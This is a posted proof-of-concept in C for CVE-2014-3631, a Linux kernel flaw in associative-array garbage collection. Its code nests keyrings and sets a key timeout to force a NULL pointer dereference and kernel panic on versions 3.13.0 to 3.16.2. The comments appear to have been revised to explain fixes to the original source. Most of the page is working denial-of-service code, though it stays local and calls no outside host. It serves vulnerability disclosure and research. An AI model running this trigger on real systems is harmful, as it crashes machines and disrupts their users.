
cve-2014-3631 Linux Kernel D.O.S POC

D 23 February 2015     H 20:37     A Emeric Nasi     C 0 messages


  3. /* ----------------------------------------------------------------------------------------------------
  4.  * cve-2014-3631_poc.c
  5.  *
  6.  * The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3
  7.  * does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash)
  8.  * or possibly have unspecified other impact via multiple "keyctl newring" operations followed by a "keyctl timeout" operation.
  9.  *
  10.  *
  11.  * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
  12.  *
  13.  * Compile with gcc -fno-stack-protector -Wall -o cve-2014-3631_poc cve-2014-3631_poc.c -lkeyutils
  14.  *
  15.  *
  16.  * Emeric Nasi - www.sevagas.com
  17.  *-----------------------------------------------------------------------------------------------------*/
  18.  
  19.  
  20. /* ----------------------- Includes ----------------------------*/
  21.  
  22. #define _GNU_SOURCE 1
  23. #include <stdint.h>
  24. #include <stdio.h>
  25. #include <stdlib.h>
  26. #include <string.h>
  27. #include <unistd.h>
  28. #include <sys/mman.h>
  29. #include <syscall.h>
  30. #include <stdint.h>
  31. #include <inttypes.h>
  32. #include <keyutils.h>
  33. #include <fcntl.h>
  34.  
  35.  
  36. #define TARGET_KERNEL_MIN "3.13.0"
  37. #define TARGET_KERNEL_MAX "3.16.2"
  38. #define EXPLOIT_NAME "cve-2014-3631"
  39. #define EXPLOIT_TYPE DOS
  40.  
  41.  
  42. /* ----------------------- functions ----------------------------*/
  43.  
  44.  
  45.  
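/**
 * PoC for CVE-2014-3631: assoc_array_gc() in lib/assoc_array.c does not
 * implement garbage collection correctly on Linux kernels before 3.16.3
 * (see the file header).  The program creates one keyring under the
 * user keyring, fills it with child keyrings, and puts a short timeout on
 * the last child so that the key garbage collector walks the associative
 * array once the kernel's gc_delay has elapsed.  Nothing is exploited
 * beyond that; on an affected kernel the file header describes the result
 * as a NULL pointer dereference and system crash.
 *
 * Return value: 0 once the timeout has been set, -1 if a keyring could not
 * be created or the timeout could not be applied (errno is printed).
 */
int main(void)
{
    key_serial_t current_key = 0;
    key_serial_t top_key = 0;
    char kname[16] = {0};
    char gc_delay[16] = {0};
    int delay = 0;
    /* Number of child keyrings added under the top keyring; kept at the
     * original value of 18. */
    const int child_keyrings = 18;

    printf("[cve_2014_3631]: Preparing to exploit.\n");

    /* Read the kernel's key GC delay so the final message can say how long
     * until the collector runs.  The value is informational only; if it is
     * unreadable we fall back to the 5 minutes the original message assumes. */
    int fd = open("/proc/sys/kernel/keys/gc_delay", O_RDONLY);
    if (fd == -1) {
        printf("[cve_2014_3631 error]: Could not open /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes. \n");
        delay = 300;
    } else {
        /* The original called read() with sizeof(gc_delay-1), which is the
         * size of a char pointer rather than of the buffer.  Read at most
         * sizeof(gc_delay)-1 bytes so the buffer is always NUL-terminated. */
        ssize_t n = read(fd, gc_delay, sizeof(gc_delay) - 1);
        close(fd);
        if (n <= 0) {
            printf("[cve_2014_3631 error]: Could not read /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes. \n");
            delay = 300;
        } else {
            gc_delay[n] = '\0';
            /* strtol reports a parse failure through endptr; atoi would
             * silently return 0. */
            char *end = NULL;
            long parsed = strtol(gc_delay, &end, 10);
            delay = (end == gc_delay) ? 300 : (int)parsed;
        }
    }

    /* Add the top keyring to the user keyring. */
    top_key = add_key("keyring", "Lvl1K", NULL, 0, KEY_SPEC_USER_KEYRING);
    if (top_key == -1) {
        printf("[cve_2014_3631 error]: keyring fault\n");
        perror("add_key");
        return -1;
    }

    /* Add the child keyrings "Lvl2K_0" .. "Lvl2K_17" under the top keyring.
     * "Lvl2K_" plus at most two digits and the NUL fits comfortably in the
     * 16-byte buffer; snprintf bounds the write regardless. */
    for (int i = 0; i < child_keyrings; i++) {
        snprintf(kname, sizeof(kname), "Lvl2K_%d", i);
        current_key = add_key("keyring", kname, NULL, 0, top_key);
        if (current_key == -1) {
            printf("[cve_2014_3631 error]: keyring fault\n");
            perror("add_key");
            return -1;
        }
    }

    /* Entering exploit critical code */
    printf("[cve_2014_3631]: Exploit!\n");

    /* Expire the last child keyring after 2 seconds; the key garbage
     * collector then has an expired entry to remove from the associative
     * array.  The original ignored the return value, so a failure here
     * would have been reported as a successful trigger. */
    if (keyctl_set_timeout(current_key, 2) == -1) {
        printf("[cve_2014_3631 error]: could not set key timeout\n");
        perror("keyctl_set_timeout");
        return -1;
    }

    /* Wait for garbage collector */
    printf("[cve_2014_3631]: Exploit triggered, system will panic in %d seconds..\n", delay);

    return 0;
}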


